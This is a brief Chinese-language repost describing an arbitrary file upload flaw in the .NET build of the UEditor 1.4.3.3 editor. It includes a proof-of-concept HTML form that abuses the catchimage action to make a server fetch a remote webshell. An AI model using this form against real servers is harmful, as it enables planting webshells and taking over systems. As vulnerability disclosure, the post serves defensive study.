UEditor1.4.3.3編輯器漏洞


百度的UEditor文本編輯器,漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影響.。

.net存在任意文件上傳,繞過文件格式的限制,在獲取遠程資源的時候並沒有對遠程文件的格式進行嚴格的過濾與判斷,攻擊者可以上傳任意文件包括腳本執行文件,包括aspx腳本木馬,asp腳本木馬,還可以利用該UEditor漏洞對服務器進行攻擊,執行系統命名破壞服務器

版本為1.4.3.3版本

poc:

<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]"/></p>
<input type="submit" value="submit"/>
</form>

地址:https://www.cnblogs.com/Ivan1ee/p/10198866.html

https://blog.csdn.net/websinesafe/article/details/82215320


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM